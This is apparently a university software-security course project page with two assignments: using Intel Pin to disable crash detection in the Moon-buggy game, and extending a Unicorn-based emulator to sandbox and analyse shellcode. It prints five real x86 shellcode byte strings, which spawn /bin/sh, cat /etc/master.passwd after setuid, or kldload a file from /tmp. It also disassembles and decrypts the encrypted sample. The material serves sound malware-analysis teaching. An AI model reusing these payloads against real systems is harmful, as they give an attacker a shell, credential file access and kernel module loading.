Project - HackMD

Please use ELMS-Canvas to submit your projects.
- Deadlines are posted in the ELMS-Canvas.
- Feedback will be available after the grading.

Preparation: Installing Intel Pin

If your Linux system does not have Intel Pin installed. (If you have downloaded VirtualBox VM, it would have Pin installed, so skip this part).
Download the https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh and run it.
```
$ cd
$ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh
$ chmod +x pin.sh
$ ./pin.sh
```
1. It will download, unzip, and install the Pin.
2. After the installation, close the terminal and open a new terminal.
3. If it can run the pin binary in your home folder, the installation is successful.

Documents for Pin

Intel Pin for Perturbing Program Executions: Examples
Please see this page to turn off ASLR (Address Space Layout Randomization).
Intel Official Documents: Pin User Manual, Pin API Reference

Project 1: Zombie Moon-buggy

Background

You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes.

Full Description

First, watch the video. It shows two moon buggy executions.

The first execution is the original game without any execution perturbation. You will see it crashes if you do not properly jump to avoid the holes on the ground.
The second execution is the original game with a Pin tool perturbing the execution to disable the crash detection logic. It shows even after it crashes, the buggy keeps going.
- Even though the buggy looks damaged, it still functions (e.g., keep going and firing).

You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code.

Hints: You need to look at "crash detection" mechanism. In other words, you need to focus, how the program detects the buggy ran into the holes and crashes the buggy.

Resources

Download Moon-buggy Program

How to compile and run the moon-buggy program

Download and extract it.

Install required packages: autoconf, automake, texinfo, libncurses5-dev, libncursesw5-dev

$ sudo apt-get install autoconf automake texinfo 
$ sudo apt-get install libncurses5-dev libncursesw5-dev

Run the following commands

$ ./autogen.sh
$ ./configure
$ make

Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh

The below script will create a directory and download/unzip all the required files.

$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
$ chmod +x prj1.sh
$ ./prj1.sh

Extra Challenge

The buggy has a laser that can be fired by key a. Whenever you do, it would deduct your game score. Can you make it increase the score? (e.g., everytime you use the laser, you gain 10000 scores)

Hints: You need to find out how the score is modified regarding the laser.

What to submit

Your Pin tool code (please submit a single C/C++ file).
Report that includes
(1) High-level descriptions of how your Pin tool works.
(2) Instructions and memory locations (i.e., variables) you have changed to make the game invincible. Those are identified via manual analysis.
(3) Implementation strategies of your Pin tool.

Project 2: Emulating Partial Program (Shellcode)

Backgrounds

Remote exploitation of vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends maliciously crafted inputs to a vulnerable program. Such an input often consists of two parts: a malicious payload, which will be executed after a successful exploitation, and an input exploits the vulnerability to hijack the control flow to redirect it to the injected payload.

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

The above figure shows an example scenario.

First, an attacker sends a malicious payload to a vulnerable program, typically through a legitimate channels.
- Any code that allocates the memory and fills the data from the attack can be used.
- Attackers typically repeat this process many time so that it can spread many instances of malicious payload on the memory.
Second, a vulnerability triggering input is sent to the program to trigger a vulnerability and hijack the control flow to execute the injected payload.
- Then, it runs the injected malicious payload (those in the green boxes), which will create a process of /bin/sh.

Since the malicious payload is essentially code bytes of a sequence of instructions, it can be anything. In practice, there are two typical forms of malicious payload: shellcode or ROP.
In this project, we only focus on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/.

What is this project about?

Assume that you obtain a potential malicious payload (e.g., from network logs), you would like to know what they are doing. Executing them on a real machine or VM is a viable option, but it will also harm the entire VM or machine if the exploitation is successful. Sandboxing is a technique that can run the program while preventing the target program making any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code or program as it can observe malicious actions without harming the host system.

This project asks you to create a sandboxing tool that execute them safely using code emulation techniques. Specifically, give a sequence of code bytes (i.e., instructions), you run them and report what actions they make (e.g., call a system call, doing a particular computations, etc.).

Given Five shellcodes

You are given the below shellcode examples. Your goal is to make your program properly interpret their executions (e.g., what system calls were made with which arguments):

Example 1: CODE_EXAMPLE1

\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0
\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1

Example 2: CODE_EXAMPLE2

\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Example 3: CODE_EXAMPLE3

\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd
\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61
\x73\x73\x77\x64

Example 4: CODE_EXAMPLE4

\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57
\x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64
\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f

Example 5: CODE_EXAMPLE5

\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed
\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4
\x51\x55\x54\x51\xb1\x0c\xce\x81

Given program

You are given to a program emul.py which leverages the unicorn framework to run a given shellcode and produce executed instructions and results.

Already supported system calls

The program is already capable of executing a simple shellcode that does not cause any errors and uses a few system calls.

Syscall Number	Syscall Name
1	sys_exit
4	sys_write
11	sys_execv
48	sys_signal

Already supported code examples

The program is already capable of running the first two shellcode samples: CODE_EXAMPLE1 and CODE_EXAMPLE2.

The below screenshot is an example of executing CODE_EXAMPLE1 with the provided program:

The program is configured as follows:

Shellcode exists from the address of 0x1000000
Stack exists from the address of 0x1200000
The shellcode example 1 is 39 bytes, where obviously many of them did not executed.
- The below figure visualizes executed code (in red text/box). Bytes underlined together indicate bytes for each instruction. Arrows mean control flow changes.
- Observe that there are still many instructions uncovered (which will be handled by the continue command below).
The program already supports the continue command, that can execute the remaining instructions that are not covered.
- Running with continue two more times will give you the following output, meaning that there no remaining instructions to execute.
  - To understand how continue is implemented, search inst_remain variable in project3.py and check the related code.

Not supported examples

While Code Example 1 and 2 are already supported, Example 3, 4, and 5 are not supported correctly.
Your goal is to add the code to support them. Here is the list of challenges and potential solutions.

Example 3 and 4

System call 0x17 is not supported.
- 0x17 is SYS_SETUID. It takes a single argument which is passed via EBX register.
[Optional] System call 0x0 is not supported
- It is up to you to support this or not. Simply adding a elif for the system call 0 and print a message (not an error message) would be sufficient.
The below instructions are in fact a string. This is already used in a previous system call. When we detect a string is executed as an instruction, print out a message that it is executing a string, hence no need to analyze the outcomes.
Expected output (Your goal is to change the problem to behave like the below screenshot; printing Are we executing a string? when an address that is known to be a string is executed):

Example 5

Example 5's shellcode is encrypted. The below is the shellcode.

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12
4:  31 db                   xor    ebx,ebx
6:  5b                      pop    ebx
7:  b1 19                   mov    cl,0x19
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9
10: eb 05                   jmp    0x17
12: e8 ed ff ff ff          call   0x4
17: 32 c1                   xor    al,cl
19: 51                      push   ecx
1a: 69 30 30 74 69 69       imul   esi,DWORD PTR [eax],0x69697430
20: 30 63 6a                xor    BYTE PTR [ebx+0x6a],ah
23: 6f                      outs   dx,DWORD PTR ds:[esi]
24: 32 dc                   xor    bl,ah
26: 8a e4                   mov    ah,ah
28: 51                      push   ecx
29: 55                      push   ebp
2a: 54                      push   esp
2b: 51                      push   ecx
2c: b1 0c                   mov    cl,0xc
2e: ce                      into
2f: 81                      .byte 0x81

Observe that the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> …
In particular, see the loop between 9 to e.

9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9

The loop does a very simple decryption (value = value - 1), where the target buffer of this decryption is the code from 17.

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12 ----------------------------|
4:  31 db                   xor    ebx,ebx <------------------------|--|
6:  5b                      pop    ebx                              |  |
7:  b1 19                   mov    cl,0x19                          |  |
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1        |  |
d:  42                      inc    edx                              |  |
e:  e2 f9                   loop   0x9                              |  |
10: eb 05                   jmp    0x17                             |  |
12: e8 ed ff ff ff          call   0x4  <---------------------------|--|
--------------------------------------------
17: 32 c1                   xor    al,cl
...

If we manually apply the decryption, we get the following code:

0:  31 d2                   xor    edx,edx
2:  eb 0e                   jmp    0x12
4:  31 db                   xor    ebx,ebx
6:  5b                      pop    ebx
7:  b1 19                   mov    cl,0x19
9:  83 2c 1a 01             sub    DWORD PTR [edx+ebx*1],0x1
d:  42                      inc    edx
e:  e2 f9                   loop   0x9
10: eb 05                   jmp    0x17
12: e8 ed ff ff ff          call   0x4
--------------------------------------------
17: 31 c0                   xor    eax,eax
19: 50                      push   eax
1a: 68 2f 2f 73 68          push   0x68732f2f
1f: 68 2f 62 69 6e          push   0x6e69622f
24: 31 db                   xor    ebx,ebx
26: 89 e3                   mov    ebx,esp
28: 50                      push   eax
29: 54                      push   esp
2a: 53                      push   ebx
2b: 50                      push   eax
2c: b0 0b                   mov    al,0xb
2e: cd 80                   int    0x80

Now, your goal is to improve the program to handle this code.
If you run the project3.py that we modified so far, you will get the following screenshot.

Currently, the program stops analysis if it encounters the same instruction twice within the same execution.

See the below code in hook_code().












# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    ...
    elif address in inst_executed_local:
        if address in cnt_repeated:
            cnt_repeated[address] = cnt_repeated[address] + 1
        else:
            cnt_repeated[address] = 1
        output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address])
        out(output)
        uc.emu_stop()
        return

This code will terminate the analysis uc.emu_stop() when there is any instruction executed more than once (see the condition at line 4).

As we saw, the decryption requires a loop. So, you have to allow them to execute instructions repeatedly. In this homework, you are asked to run each instruction up to 100 times.

After you do, we get the following result:

Now, we can execute the first system call but, continue for the decrypted code does not work.

Observe that the code is the original code, that are not correctly decrypted.
This is because when we run the program again, we lost the previous memory state that has the decrypted code.

The last piece of this project is to save the memory state at the end of the execution and load them in the next run.

The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments.

What to do

Download the unicorn framework.
Download the emul.py and emul_util.py. Put them in the bindings folder.
- emul.py
- emul_util.py
Follow the above description and the lecture video to improve the program so that it can handle all the five example shellcodes.

Resources

Installation Script: https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh

The below script will create a directory and download/unzip all the required files.

$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
$ chmod +x prj2.sh
$ ./prj2.sh

What to submit

Final source code
Screenshots of each example shellcode running correctly on your terminal.